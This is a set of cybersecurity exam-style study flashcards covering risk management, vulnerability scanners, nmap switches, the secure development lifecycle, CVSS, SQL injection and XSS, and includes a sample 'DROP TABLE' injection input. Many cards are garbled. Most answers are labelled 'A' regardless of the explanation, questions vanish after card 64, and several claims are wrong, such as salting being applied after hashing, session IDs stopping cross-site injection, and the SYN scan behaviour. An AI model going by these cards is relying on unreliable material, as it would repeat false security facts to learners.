2. Vulnerability Types and Concepts Flashcards

Question 1

Q

When assessing the steps to take to protect a system, which of the following should guide your selection of measures?

A)Exploitability of the system

B)Level of difficulty in mounting an attack

C)Asset value

D)Potential for weaponization of the system

Answer

A

When performing risk analysis with regard to protecting a system, asset value (which encompasses the value of the data it holds) should guide the selection of countermeasures or controls to be implemented. The cost of controls should never exceed the cost of suffering a successful attack.

The exploitability of the system, the level of difficulty in mounting a successful attack, and the likelihood that the system could be potentially weaponized are all important considerations, but these factors do not outweigh the cost of the controls versus the projected impact of the risk.

Question 2

Q

Which of the following cryptographic attacks can be mitigated by salting the password?

A)brute force
B)known plaintext
C)pass the hash
D)side channel

Answer

A

A brute-force attack attempts to discover the key that was used to encrypt the data. This attack can be made easier when a rainbow table is used. This is table of possible key values and their corresponding hash values. By using this table, the hacker eliminates one of the steps in cracking the key, thereby speeding up the process of decrypting the data. This attack can be mitigated by adding a random value to the key after it has been hashed, a process called salting the password.

Question 3

Q

What is a know-plaintext attack?

Answer

A

A known-plaintext attack is one in which the attacker keeps several samples of plain text and ciphertext. Using these samples, the attacker tries to identify the encryption key that was used to encrypt the text. After determining the key, the attacker can convert the rest of the cipher text into plain text by using the same key.

Question 4

Q

What is pass the hash?

Answer

A

Pass the hash (PtH) is an attack in which an adversary obtains a “hashed” user credential and uses it to create a new user session on the same network.

Question 5

Q

Side-channel attack?

Answer

A

In a side-channel attack, the hacker attempts to discover information helpful to cracking the key by observing timing information, power consumption, electromagnetic leaks, and sounds made during the processing.

Question 6

Q

Your team has arrived at a set of security configurations and applied them to the appropriate machines using a Group Policy object. Later, at regular intervals, the systems will be scanned to ensure the organization is still conforming to its requirement. Which of the following statements BEST describes the requirement it must meet?

A)CIS benchmark
B)security baseline
C)PCI-DSS
D)ISO 27000 series

Answer

A

When sets of security configurations are created, they are called security baselines. When you scan later to ensure compliance, you are performing baseline security scanning.

Question 7

Q

CIS

Answer

A

While the security baseline you create might conform to an industry security standard, such as the Center for Internet Security (CIS) benchmark, there is no indication in the scenario that this is the case. A generic group of settings is called a security baseline. CIS benchmarks are prescriptive configuration recommendations for more than 25 vendor product families.

Question 8

Q

ISO 2700 series

Answer

A

The ISO 27000 series comprises security standards published jointly by the ISO and the International Electrotechnical Commission (IEC).

Question 9

Q

PCI DSS

Answer

A

Payment Card Industry Data Security Standard (PCI DSS). This standard is an information security standard for organizations that process credit card transactions or handle cardholder data from the major credit card vendors.

Question 10

Q

You are negotiating with an IT service provider. You would like to ensure that your web server is able to maintain 99.99% uptime. This uptime is an expression of what?

A)Maintenance window
B)Maintenance exclusion
C)Responsive control
D)SLO

Answer

A

99.99% uptime is an expression of a service level objective (SLO). SLOs are the critical metrics within a Service Level Agreement (SLA) that a provider must meet for a client. Policies, governance, and SLOs are key components of attack surface management. SLOs begin with a service level indicator (SLI), which is the item for which performance or service is tracked. An example of an SLI could be server uptime – this is the item for which you want service tracked. The corresponding SLO would be expressed as a percentage: server uptime should be 99.99%.

Question 11

Q

Maintenance Window

Answer

A

A maintenance window is a recurring period during which patches and configuration changes (maintenance) are performed. These maintenance windows are typically used for automatic patch deployment and configuration changes. When scheduling a maintenance window, it is important to consider the impact of downtime to the organization, customers, and operations.

Question 12

Q

Maintenance Exclusion

Answer

A

A maintenance exclusion (or maintenance exception) is a timeframe or instance when maintenance would be prohibited. This could be the case when a legacy application cannot be updated. Another example of a maintenance exclusion could be a retail organization that forbids configuration changes during a peak sale period. The maintenance exception should be submitted as a request that is subsequently approved by the change management team.

Question 13

Q

Responsive Controls

Answer

A

Responsive controls come into play after an event has been detected. Examples include a system reboot, activating a business continuity plan, isolating a virus to quarantine, and replacing smart access cards.

Question 14

Q

Your organization’s management has recently spent time discussing attacks against companies and their infrastructures. During the meeting, the Stuxnet attack was discussed. Against which type of system did this attack occur?

A)Kerberos
B)SCADA
C)VoIP
D)RADIUS

Answer

A

A Stuxnet attack occurs against a Supervisory Control and Data Acquisition (SCADA) system. A SCADA system is also referred to as an industrial control system (ICS). SCADA is a category of software that gathers data in real time from remote locations to control equipment and conditions. It is used to monitor critical systems and control power distribution. In recent years, it has become even more vital to protect these systems. SCADA is used in the power, oil, telecommunications, gas refining, water treatment, nuclear facilities, and waste control industries.

Question 15

Q

Kerberos and RADIUS

Answer

A

Kerberos is an authentication system that includes clients, servers, and a key distribution center (KDC). The KDC gives clients tickets that the clients use to access servers and other resources.

Remote Authentication Dial-In User Server (RADIUS) is a remote access technology that allows remote users to centrally sign on to access the resources on the local network.

Question 16

Q

You are the security administrator for your company and have identified a security risk that cannot be corrected with in-house personnel. You decide to hire an outside contractor who will be responsible for handling and managing this security risk. Which risk management principle is being described?

A)Avoid
B)Transfer
C)Accept
D)Mitigate

Answer

A

The risk management principle of transfer (transference) is being described. Transference involves shifting the risk and its consequences to a third party who is then responsible for owning and managing the risk. Purchasing insurance is an example of transference.

Question 17

Q

Risk management principles: Avoid

Answer

A

The avoid principle (avoidance) involves modifying the security plan to eliminate the risk or its impact. Examples of avoidance would include stopping a risky activity altogether, adding security resources to eliminate the risk, or removing resources to eliminate the risk.

Question 18

Q

Risk management principles: Acceptance

Answer

A

The risk management principle of accept (acceptance) is when you acknowledge that a risk may occur, but do not change the security plan to prevent the risk. Examples of acceptance would include taking no action at all or developing a contingency or fallback plan. It is recommended that you accept a risk when the cost of the safeguard exceeds the amount of the potential loss.

Question 19

Q

Risk management principles: Mitigate

Answer

A

The mitigate principle (mitigation) involves reducing the probability or impact of a risk to an acceptable risk threshold. To mitigate a risk, you would take actions to minimize the probability of the risk occurring. Biometric locks on a server room’s doors mitigate the risk of an intruder breaking in where sensitive data is housed.

Question 20

Q

Which of the following would determine if safeguards that have been installed were properly implemented, performing as expected and producing the appropriate results?

A)Security controls testing
B)Bug bounty
C)Penetration testing and adversary emulation
D)Attack surface reduction

Answer

A

Security controls testing determines if safeguards that have been installed were properly implemented, performing as expected and producing the appropriate results. Security controls are grouped into three main categories: technical, administrative, and physical. For example, a test of a physical security control could be checking to see if an access control card denies entry into a specific area.

Question 21

Q

Pen Testing

Answer

A

Penetration testing and adversary emulation are critical for attack surface management. The goal of penetration testing is to determine as many vulnerabilities as possible within defined time and scope parameters.

Question 22

Q

Adversary or Threat emulation

Answer

A

Adversary emulation (also known as threat emulation) adopts current threat intelligence methodologies and tactics to identify, expose and correct vulnerabilities. Adversary emulation is particularly suited to measure the organization’s ability to withstand an attack from advanced persistent threats.

Question 23

Q

Bug Bounty

Answer

A

A bug bounty is a reward for finding security flaws (bugs) in an application. Organizations will attract ethical hackers to find vulnerabilities. Once found, the ethical hackers are rewarded, often with some prestige or notoriety like being mentioned on a leaderboard. Finding and correcting vulnerabilities helps reduce the attack surface.

Question 24

Q

Attack surface reduction

Answer

A

Attack surface reduction refers to hardening areas that are potential entry points, including cloud infrastructure. Examples of items that can be addressed include deleting unused accounts, closing unused ports, implementing the principle of least privilege, and removing hardware that is no longer used.

Question 25

Q

Snort is one of the tools used by your company. What functionality does this tool provide?

A)IDS/IPS
B)Vulnerability scanner
C)Firewall
D)SIEM

Answer

A

Snort provides intrusion detection system (IDS) and intrusion prevention system (IPS) functionality, including logging and real-time traffic analysis.

Question 26

Q

What systems include firewalls?

Answer

A

Cisco, Palo Alto, and Checkpoint. Firewalls can sometimes include other functionalities, such as IDS and IPS functions.

Question 27

Q

SIEM Tool include?

Answer

A

SIEM tools include ArcSight, QRadar, Splunk, AlienVault, OSSIM, and Kiwi Syslog.

Question 28

Q

Vulnerability Scanners include?

Answer

A

Vulnerability scanners include Qualys, Nessus, OpenVAS, Nexpose, Nikto, and Microsoft Baseline Security Analyzer. Regarding OpenVAS and Nikto, OpenVAS is a full-featured vulnerability scanner, while Nikto is best for vulnerability scanning of web servers and their files.

Question 29

Q

After a number of unsuccessful attempts were made to attack your websites, your organization is looking to increase its knowledge about the latest threats to web applications. As part of this process, management has asked you to identify a list of the top 10 attacks and report these attacks on an ongoing basis. Which organization provides this information?

A)SANS
B)CIS
C)OWASP
D)ISO

Answer

A

The Open Web Application Security Project (OWASP) is a group that monitors attacks, specifically web attacks. OWASP maintains a list of the top 10 attacks on an ongoing basis. This group also holds regular meetings at chapters throughout the world, providing resources and tools including testing procedures, code review steps, and development guidelines.

Question 30

Q

What is SANS?

Answer

A

The SysAdmin, Audit, Network, and Security (SANS) organization also provides guidelines for secure software development, and they sponsor the Global Information Assurance Certification (GIAC). They also provide training, perform research, and publish best practices for cybersecurity, web security, and application security.

Question 31

Q

What is CIS used for?

Answer

A

The Center for Internet Security (CIS) is a not-for-profit organization known for compiling CIS Security Controls (CSC). From this research, they publish a list of the top 20 security controls. They also provide hardened system images, training, assessment tools, and consulting services.

Question 32

Q

ISO

Answer

A

The International Organization for Standardization (ISO) develops and publishes international standards.

Question 33

Q

Which of the following best practices would be the best application development tool to secure against SQL injection attacks?

A)Session management
B)Parameterized queries
C)Authentication
D)Data protection

Answer

A

Parameterized queries would be the best application development methodology to secure against SQL injection attacks. Parameterized queries allow you to use placeholders (parameters) instead of the actual input values. In the event a malicious user enters an SQL command into a text field, such as “DROP TABLE tablename”, the parameterized query would not read that as a command but rather as a bad email address.

Question 34

Q

What can you use to protect from Cross-Site injection attacks?

Answer

A

Session management protects against cross-site injection attacks by creating a token. This is accomplished through the creation of a session identifier (session ID) that is exchanged between the user and the web application. Session IDs should be at least 128 bits and should contain sufficient random characters to prevent a brute force attack.

Question 35

Q

Your organization recently deployed a commerce server in the cloud. They want to ensure that all requirements of PCI-DSS are implemented. Which open-source security tool contains hundreds of controls covering PCI-DSS requirements?

A)Immunity Debugger
B)Prowler
C)Maltego
D)Arachni

Answer

A

Prowler is an open-source tool used to perform best practices assessments and audits, with hundreds of controls covering PCI-DSS requirements.

Question 36

Q

What is Immunity Debugger tool?

Answer

A

Immunity Debugger is not a cloud tool. It supports a Python-based API and allows for the writing of exploits, analyzation of malware, and reverse engineering of binary files.

Question 37

Q

Maltego

Answer

A

Maltego is a not a cloud tool. It is a Java-based tool for discovering data from OSINT, private, and commercial data sources and visualizing that information in combined form in a graph format. The results can be used for link analysis and data mining.

Question 38

Q

Arachni

Answer

A

Arachni is not a cloud tool. It is used for IP scanning and is a high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of modern web applications.

Question 39

Q

What does nmap - sn function do?

Answer

A

you performed a host discovery scan by executing nmap -sn. This scan performs enumeration on the network for all active hosts.

Question 40

Q

nmap - sn

Answer

A

(no port scan, also called a ping scan)

The Nmap tool (short for network mapper) is commonly used to perform port scans, OS identification, and version or banner grabbing against services. Its main use is to discover the status of port numbers and IP addresses. It is widely used by administrators for network management and monitoring, and by criminal hackers to discover and investigate attack targets. The -sn switch (also called a ping scan) is the most common switch and is used for host discovery. Note that this type of scan is noisy and sends out packets for discovery, which in turn adds more traffic to the network and is visible to logs and Wireshark.

Question 41

Q

nmap

Answer

A

List scan

Question 42

Q

Nmap -pn

Answer

A

no ping scan

Question 43

Q

nmap -ps

Answer

A

port list TCP version

Question 44

Q

nmap -pu

Answer

A

port list UDP version

Question 45

Q

nmap - ss

Answer

A

stealth TCP connect scan

A stealth scan uses the -sS switch, which is one of the two TCP connect scans. (The -sT switch is the other.) A stealth scan is not as loud as a ping scan due to the fact that it sends a SYN packet to the port and. If it is open, it will send back an ACK and then an RST (reset) packet, leaving things quiet.

Question 46

Q

nmap - st

Answer

A

default TCP connect scan

Question 47

Q

nmap (compliance)

Answer

A

Compliance scans, by their very nature, are interested in whatever compliance rules your company needs to follow. For instance, if you are a hospital or medical clinic, you need to be in compliance with HIPAA.

Question 48

Q

Your organization is planning a vulnerability scan and would like to maintain an awareness of the possible contexts in which the scan is performed. In which context would the scan reveal the likelihood of an attack on the router directly attached to the Internet?

A)Segregated
B)External
C)Isolated
D)Internal

Answer

A

The context of a scan describes the position of the attacker when the scan (or subsequent attack) is performed. An external scan is performed from outside the network and simulates an attack on the device directly connected to the Internet.

Question 49

Q

Internal vulnerability scan

Answer

A

An internal scan is one that is performed from inside the firewall and simulates an attack by an insider or by an attacker who has breached the external network.

Question 50

Q

Isolated Vulnerability scan?

Answer

A

An isolated scan is one that is performed on a network or part of a network that is isolated from the Internet and perhaps from the internal network as well. A good example of this a virtual network with no connection to the Internet or internal network. This type of scan would probably require some type of internal assistance to the attacker as the scan would require access to the isolated network.

Question 51

Q

You have been tasked with upgrading the processes in the software development life cycle (SDLC) to the secure SDLC (SSDLC). What would you incorporate into the Planning and Requirements phase of the SDLC to make that section secure?

A)Threat modeling
B)Gap analysis
C)Secure coding
D)Unit testing

Answer

A

In the Planning and Security Requirements phase of the SSDLC, you would add gap analysis. Gap analysis identifies missing security elements and allows for these elements to be included in the development process. Adding gap analysis to the Planning and Requirements phase of the SDLC creates the Planning and Security Requirements phase of the SSDLC.

Question 52

Q

What model would you use in design phase of SDLC leading into a prototype of SSDLC?

Answer

A

Threat modeling would be added to the Design phase of the SDLC, becoming the Secure Design and Prototyping phase of the SSDLC.

Question 53

Q

What phase involves int the development phase of of SDLC leading into SSDLC?

Answer

A

Secure coding would be added to the Development phase of the SDLC, becoming the Secure Development phase of the SSDLC.

Question 54

Q

What is used in the Testing phase of the SDLC resulting into vulnerability testing phase of the SSDLC?

Answer

A

Unit testing would be added to the Testing phase of the SDLC, resulting in the Security and Vulnerability Testing phase of the SSDLC.

Question 55

Q

Name the 6 SDLC processes?

Answer

A

Planning and Requirements
Design
Development
Testing
Deployment
Maintenance

Question 56

Q

The corresponding phases of the secure software development lifecycle (SSDLC) process are:

Answer

A

Planning and Security Requirements
Secure Design and Prototyping
Secure Development
Security and Vulnerability Testing
Secure Deployment
Maintenance and Monitoring

Question 57

Q

SDLC Phase Name: Planning and Requirements

How to migrate to SSDLC?

Answer

A

Gap Analysis

Question 58

Q

SDLC Phase Name: Planning and Requirements

What is the Secure SDLC Phase Name?

Answer

A

Planning and Security Requirements

Question 59

Q

SDLC Phase Name: Design

How to migrate to SSDLC?

Answer

A

Threat Modelling

Question 60

Q

SDLC Phase Name: Design

What is the Secure SDLC Phase Name?

Answer

A

Secure Designing and Prototyping

Question 61

Q

SDLC Phase Name: Development

How to migrate to SSDLC?

Answer

A

Secure Coding

Question 62

Q

SDLC Phase Name: Development

What is the Secure SDLC Phase Name?

Answer

A

Secure development

Question 63

Q

SDLC Phase Name: Testing

How to migrate to SSDLC?

Answer

A

Unit Testing

Question 64

Q

SDLC Phase Name: Testing

What is the Secure SDLC Phase Name?

Answer

A

Security and Vulnerability Testing

Answer 65

A

Build routine security tests

Answer 66

A

Secure Deployment

Answer 67

A

Bug bounty program

Answer 68

A

Maintenance and Monitoring

Answer 69

A

This process described in the scenario supports the security requirements definition. The security requirements of the solution must be identified. Assigning a privacy impact rating to the data helps to guide measures intended to protect the data from exposure.

Security testing phases are undertaken after security requirements have been defined, because only when the requirements have been defined can one know if they have been met.

In manual peer review, software developers attend meetings where each line of code is reviewed, usually using printed copies.

While it is important to make web applications secure, in some cases security features make the application unusable from the user perspective. User acceptance testing is designed to ensure that does not occur.

Answer 70

A

Angry IP Scanner is an open-source and cross-platform network scanner designed to scan IP addresses and ports. It can scan IP addresses in any range as well as any of their ports. As a cybersecurity practitioner you would use this to ensure that all open ports are required and as a hacker you would use this scan for open ports to attack.

Answer 71

A

Arachni is not used for IP scanning. It is a high-performance Ruby framework aimed at helping penetration testers and administrators evaluate the security of modern web applications.

Answer 72

A

Three types of security controls are preventative controls., detective controls, and responsive controls.

Detective controls identify active security issues when they arise or find indicators of compromise. They include monitoring, job rotation, investigations, intrusion detection systems (IDSes), auditing, guards, and CCTV.

Responsive controls come into play after an event has been detected, and may be automated or preconfigured actions prepared in advance. Examples include a system reboot, activating a business continuity plan, isolating a virus to quarantine, and replacing smart access cards.

Answer 73

A

Corrective – Restore normal operations after a security incident

Answer 74

A

Managerial – Establish policies to decrease the chances of a security incident

Answer 75

A

Operational – Enact security policies with best practices and procedures

Answer 76

A

Technical – Implement hardware- and software-based tools to prevent security incidents

Answer 77

A

You should use the Common Vulnerabilities and Exposures (CVE), which provides standardized names for security-related software flaws.

Keep in mind that you may need to provide reports on identified vulnerabilities to different audiences. While technical staff may be able to read and comprehend the automatic reports generated by a vulnerability scanner, you may need to create an executive report for other non-technical staff that contains information that is more easily understood.

While having the vulnerability scanner deliver reports automatically may be preferred, it is not the best solution. Understanding automated versus manual distribution issues will ensure that you, as the security analyst, can provide your audience with information they need and understand. Automatic distribution distributes the reports automatically through internal mechanisms, often via email. Manual distribution would require more effort on the security analyst to ensure that the appropriate individuals receive the correct report.

Answer 78

A

Using the APIs exposed by cloud providers, Scout Suite gathers configuration data for manual inspection, highlights risk areas, and presents a clear view of the attack surface automatically.

Answer 79

A

The GNU Project Debugger (GDB) is a not cloud tool. It is a widely popular program debugger with many features, such as the ability to discover what a program was doing when it crashed.

Answer 80

A

Metasploit is a not cloud tool, but a framework used in penetration testing that probes systematic vulnerabilities on networks and servers.

Answer 81

A

Recon-ng is a not cloud tool. It comes with Kali Linux and automates the information gathering of open-source intelligence (OSINT).

Answer 82

A

A maintenance exclusion (or maintenance exception) is a timeframe or instance when maintenance would be prohibited. This could be the case when a legacy application cannot be updated. Another example of a maintenance exclusion is a retail organization that forbids configuration changes during a peak sale period. The maintenance exception should be submitted as a request that is subsequently approved by the change management team.

Answer 83

A

Escalation is closely related to prioritization. It is important that an organization has a prioritization and escalation policy. When an incident occurs, it is important to assign it a priority level. The priority level determines the order in which the incident is addressed. In addition, the priority level is usually associated with the team or individual within the organization that is tasked with handling that incident level. If the situation changes, conditions deteriorate, or the effects of an event spread, the priority level can be changed, allowing for escalation to another team.

A perfect example of prioritization and escalation exists in the medical community. For example, a bus carrying many passengers has crashed. First responders assign a priority level to each passenger according to the severity of their injuries. Those who can be treated at the scene are assigned a lower priority than those who must be transported to the hospital via ambulance. If a patient who is waiting for ambulance transport develops a life-threatening complication, that patient’s priority can be escalated for air transport.

Answer 84

A

Service level objectives (SLOs) are the critical metrics within a Service Level Agreement (SLA) that a provider must meet for a client. Policies, governance, and SLOs are key components of attack surface management. SLOs begin with a service level indicator (SLI), which is the item for which performance or service is tracked. An example of an SLI could be server uptime – this is the item for which you want service tracked. The corresponding SLO would be expressed as a percentage, such as a desired server uptime of 99.99%.

Answer 85

A

There is no Security metric group in the CVSS system.

Answer 86

A

Base group: represents characteristics of a vulnerability that are constant over time and do not depend on the environment. These metrics are mandatory for scoring.

Temporal group: assesses a vulnerability as it changes over time. These metrics are optional for scoring.

Environmental group: represents the characteristics of a vulnerability, taking into account the organizational environment. These metrics are optional for scoring.

Answer 87

A

STRIDE is an example of a threat modeling framework. It is a Microsoft tool developed to identify a wide variety of threats. STRIDE is an acronym for the six threats it identifies:

Spoofing identities
Tampering with data
Repudiation
Information disclosure
Denial of service
Elevation of privilege

Answer 88

A

Structured Threat Information Expression (STIX) is an open-source language platform that is used to exchange threat intelligence amongst interested parties. For example, if a major retailer discovered a threat linked to supply chain management, it might communicate the threat information to its suppliers using STIX.

Answer 89

A

An attacker can expect repeatable success when attacking the vulnerable component because the Access Complexity (AC) metric has a value of L, which stands for Low. The AC metric describes the difficulty of exploiting the vulnerability. It has two possible values:

H – stands for High and means the vulnerability requires special conditions that are hard to find.

L – stands for Low and means the vulnerability does not require special conditions.
When the AC score is high, the attack requires at least one of the following conditions to succeed:

The attacker must gather knowledge about the environment in which the vulnerable target/component exists, for example, a requirement to collect details on target configuration settings, sequence numbers, or shared secrets.

The attacker must prepare the target environment to improve exploit reliability, for example, repeated exploitation to win a race condition, or overcoming advanced exploit mitigation techniques.

The attacker must inject themselves into the logical network path between the target and the resource requested by the victim in order to read and/or modify network communications (e.g., a man in the middle attack).

Answer 90

A

Nikto is an open-source web server analysis tool and vulnerability scanner. It indexes all of the files and directories regarding the target web server, commonly known as spidering, and locates and reports any potential issues it finds.

Answer 91

A

Burp Suite is a collection of web application security tools that includes proxy capabilities and mobile application testing to determine communication with application programming interfaces (APIs) and to discover vulnerabilities in web apps.

Answer 92

A

Zenmap is the graphical user interface (GUI) version of the Nmap Security Scanner. Zenmap is a free and open-source program designed to make Nmap easier for beginners to learn and use, but it also provides features that are extremely useful for experienced Nmap users. It can be used to determine the differences between multiple Nmap scans, such as two Nmap scans run on different days.

Answer 93

A

Nessus is a scanning tool for remote security that scans a device or network of devices and raises an alert if it comes across any vulnerabilities that malicious hackers could use to get into your network and cause damage.

Answer 94

A

The type of error that occurred is a false negative. The vulnerability scan indicated no vulnerabilities existed when, in fact, one was present.

Security analysts should analyze reports from a vulnerability scan. This involves reviewing and interpreting scan results. As a result, security analysts need to identify false positives, identify exceptions, and prioritize response actions.

Answer 95

A

A true negative is when a vulnerability scan reports no issue and no issues exist

Answer 96

A

A true positive is when a vulnerability scan reports a vulnerability that does exist

Answer 97

A

A false positive is when a vulnerability scan reports a vulnerability that does not exist.

Answer 98

A

Input validation ensures that all input is checked for the proper length. Validating input for length helps prevent buffer overflow attacks because buffer overflows present more input than was expected, overflowing the memory reserved for the input.

Answer 99

A

The other best practices of the Software Development Life Cycle (SDLC) include:

Security testing phases – including static code analysis, web application vulnerability scanning, and fuzz testing to identify vulnerabilities.
User acceptance testing – designed to ensure security features do not make the application unusable from the user perspective.
Stress test application – determines the workload that the application can withstand.
Security regression testing – validates that changes have not reduced the security of the application, nor opened new weaknesses that were not there prior to the change.

Answer 100

A

The nmap -sn command executes a ping sweep, which can be used to identify all live devices and as such can also be called a map scan, ping scan, or host discovery scan. The -sn switch is the most common switch and is used for host discovery, but does not scan ports. Sample output of this scan is shown below:

Answer 101

A

While the command $ nmap -sn 192.168.0.1- only identifies the devices and their IP addresses, a device fingerprint identifies the operating system and its version. Obtaining this information would require adding the -O switch, which enables operating system discovery.

Answer 102

A

You should instruct the new security analyst to obtain the Vulnerabilities Grouped by Plugin subset of the current scan. This is available from the main report in Nessus. A plugin is a simple program that checks for a given flaw.

You should not instruct the analyst to obtain Vulnerabilities Grouped by Host subset of the current scan. This will list the vulnerabilities for a given host.

You should not instruct the analyst to obtain the Suggested Remediations subset of the current scan. It summarizes the actions to take that address the largest quantity of vulnerabilities on the network.

You should not instruct the analyst to obtain a Credentialed scan. You can obtain the information you need from the current non-credentialed scan.

Answer 103

A

Since the implementation document specifies a desired setting at variance with the actual setting that exists on the device, this is a security misconfiguration.

This is not an example of insecure design. There is no indication that the desired configuration in the design document is incorrect or insecure.

This is not an issue with its roots in an end-of-life or outdated component. An example of that would be if the consultant discovered that the router was so old that the vendor no longer provided support for it.

This is not an issue in the category of identification and authentication failure. An example of this would be if the consultant discovered that the router allowed them to log on as administrator when that should not be allowed.

Answer 104

A

The GNU Project Debugger (GDB) is a widely popular debugger with many features. With this program, you can discover what a program was doing when it crashed.

Answer 105

A

Metasploit framework (MSF) is a framework used in penetration testing that probes systematic vulnerabilities on networks and servers. It would not help determine why the application crashes occur.

Answer 106

A

The Immunity Debugger is a tool that supports a Python-based API. It allows for the writing of exploits, analyzation of malware, and reverse engineering of binary files. It would not help determine why the crashes occur.

Answer 107

A

Your first step would be to implement testing when a new patch is issued or a configuration change is necessary. Regarding new patches, it would be impossible for a publisher to account for every possible implementation of a new patch. Therefore, you should install and test new patches and configuration changes on isolated equipment. If the change fails, the effects are localized and not catastrophic to the organization.

Validation checks are performed after the patch is installed or the configuration change is made to see if it performing as it should. Did the configuration change perform as claimed, or did it introduce unforeseen errors elsewhere in the system?

Implementation is the deployment or activation of the patch or configuration change. Implementation should follow a standardized plan with a series of steps in a checklist. As an example, one step in the implementation process could be to perform a system backup or create a system image.

Rollback returns the device or application to the state it was in prior to the patch or configuration change; in essence, rollback is an “undo”. It is highly recommended that you have a rollback plan established that allows you to restore the system to its prior state in the likely event that something goes wrong.

Answer 108

A

You should use Splunk to consolidate the logs for easier analysis. Splunk is a security information and event management (SIEM) tool. Other SIEM products include ArcSight, QRadar, AlienVault, OSSIM, and Kiwi Syslog.

Answer 109

A

Nexpose is a vulnerability scanning tool. Other vulnerability scanning tools include Qualys, Nessus, OpenVAS, Nikto, and Microsoft Baseline Security Analyzer (MBSA).

Answer 110

A

Sysinternals is a technical tool that includes resources and utilities to manage, diagnose, troubleshoot, and monitor a Microsoft Windows environment.

Answer 111

A

MRTG is an analytical monitoring tool to monitor the traffic load on network links. Other monitoring tools include Nagios, SolarWinds, Cacti, and NetFlow Analyzer.

Answer 112

A

You should review the compliance audit produced by Nessus. A compliance audit supplies vulnerabilities as measured against CIS benchmarks.

A patch audit analyzes systems and devices against patch management system of vendors to determine if the organization has not deployed the available patches.

A credentialed network scan scans the network for vulnerabilities using credentials to ensure that all areas of the devices can be examined.

A non-credential network scan scans the network without credentials so areas that require credentials for access will not be scanned.

Answer 113

A

You should first verify or validate the false positives to ensure that you can eliminate them from the report. While validation of false positives can be very time consuming, it is a necessary step to ensure that they are not true positives. Once they are verified, you can then configure exceptions for them.

Answer 114

A

Governance can be defined as how an organization’s policies and procedures are designed to thwart, identify, and react to vulnerabilities and attacks. While risk management is a component of governance, governance is an overall view that aligns legal aspects, requirements of privacy protection, and risk to the enterprise.

Answer 115

A

Risk management principles include acceptance, transference, avoidance, and mitigation.

Answer 116

A

Threat modeling is part of Secure Design and Prototyping stage of the secure software development life cycle (SSDLC). This process tries to identify security risks inherent in the application being developed. One example of a threat modeling framework is STRIDE, which is a Microsoft tool developed to identify a wide variety of potential threats. STRIDE is an acronym for the six threats it identifies:

Spoofing identities
Tampering with data
Repudiation
Information disclosure
Denial of service
Elevation of privilege

Answer 117

A

Authentication is the mechanism that validates that the user or entity is who they claim to be. Authentication can be accomplished through a username/password combination, multi-factor authentication (where more than one piece of identifying information is necessary), or through cryptographic authentication, where the user is in possession of a key that is generated through a cryptographic algorithm.

Answer 118

A

Edge discovery is the process of identifying Internet of Things (IoT) and other devices that are not part of the core infrastructure. Once identified, they can be configured so that hackers cannot use them to compromise an organization’s core network.

Edge discovery is a key component of edge security for attack surface management. Edge security is the process of securing nodes that are outside a company’s network core. The edge of the network needs the same level of security as the core network. Nodes at the edge are not fully covered by the security perimeter of the organization and so are the most vulnerable to cybersecurity risks. Computing on the edge involves computing occurring closer to edge devices rather than the infrastructure of the network. Self-driving cars, sensors, fitness bands, and IoT devices are examples of edge devices. These devices often handle sensitive data, and their compromise can compromise the full network. For this reason, it is essential that these devices are not discoverable by hackers on the Internet. Physical controls involve securing the devices and only allowing authorized personnel to use them. Logical controls involve encryption of device data both in transit and at rest and implementing authorization and authentication.

Answer 119

A

The growth in the use of edge devices has increased the attack surface for an organization. To secure edge devices, you use routers and firewalls as well as wide area network (WAN) devices which are built for security. Some best practices for edge security include:

Keep a zero-trust model throughout the company
Ensure internal configuration and control of edge devices and reject compromised devices
Use AI and ML tools to monitor edge device activity
Ensure edge devices are isolated in a public cloud to avoid discovery

Answer 120

A

Passive discovery helps to protect the network through the use of security appliances, including firewalls, intrusion detection systems (IDSes), intrusion prevention systems (IPSes), malware protection systems, and others. It is the role of these systems to monitor events and, when an event occurs, create an alert for humans to intervene.

Answer 121

A

A maintenance window is a recurring period during which patches and configuration changes (maintenance) are performed. These maintenance windows are typically used for automatic patch deployment and configuration changes. When scheduling a maintenance window, it is important to consider the impact of downtime to the organization, customers, and operations.

Answer 122

A

A passive scan impacts the hosts and network less than other scan types. It does not provide more information. To perform a more in-depth analysis than other scan types, you would perform an active scan.

Answer 123

A

A database server is most likely the victim in a SQL injection attack. A SQL injection attack inserts a SQL query as the input from the client to the application. The purpose of this attack is to read sensitive data from the database, modify the data, execute administrative operations on the database, recover the content of a given file, and even issue commands to the operating system.

Answer 124

A

The web server is usually the means whereby the SQL injection attack is delivered, but it is not really the victim of the attack. A web server is most likely the victim of cross-site scripting (XSS) and cross-site request forgery (CSRF) attacks.

Answer 125

A

Stored cross-site scripting (XSS) or persistent XSS is what is happening here. It occurs when someone has imbedded malicious code into the site that is always run when someone accesses that website. The attacker usually accesses the site via login, message board, or some other type of input. In this case, someone posted some Java code into the field input, and now that code is always going to run when the site is loaded. It is a simple way to deface a site.

Answer 126

A

This is not a reflected XSS attack. A reflected XSS attack occurs when an attacker injects code into the browser by a single HTTP response. This is usually done when a malicious link on a normally mundane site sends the user to a malware-laden server that injects code into the browsers. This did not happen in the above scenario as the website itself was defaced.

Answer 127

A

Document Object Model (DOM)-based XSS is an injection that modifies the environment in the victim’s browser using a programming interface so that the client-side code runs in an “unexpected” manner. Basically, your browser goes crazy, and the attacker takes control of things. Again, this is not the issue being described because the site itself is affected, not the browser.

Answer 128

A

According to OWASP a “Blind Structured Query Language (SQL) injection is a type of SQL injection attack that asks the database true or false questions and then determines the answer based on the web application’s response. This attack is often used when the web application is configured to show generic error messages but has not mitigated the code that is vulnerable to SQL injection.”

Answer 129

A

Pacu is a cloud penetration-testing tool that can, like other exploitation frameworks, automate some of the more common attacks. It is designed for AWS deployments.

Answer 130

A

You can use Burp Suite to capture and analyze API requests and responses in an act of reconnaissance. Burp Suite is a collection of web application security tools that includes proxy capabilities and mobile application testing to determine communication with application programming interfaces (APIs) and to discover vulnerabilities in web apps.

Answer 131

A

Session management protects against cross-site injection attacks by creating a token. This is accomplished through the creation of a session identifier (session ID) that is exchanged between the user and the web application. Session IDs should be at least 128 bits and should contain sufficient random characters to prevent a brute force attack.

Answer 132

A

The main difference between a SQL and XSS injection attack is that SQL injection attacks are used to steal information from databases whereas XSS attacks are used to redirect users to websites where attackers can steal data from them. SQL injection is data-base focused whereas XSS is geared towards attacking end users.

Answer 133

A

The Simple Network Management Protocol (SNMP) service may be abused to gain unauthorized access to network devices. It provides a standardized framework for a common language that is used for monitoring and managing devices in a network.

The File Transfer Protocol (FTP) service is not normally applicable to a retail setting. FTP is used to transfer files between servers and workstations. It can be vulnerable, though.

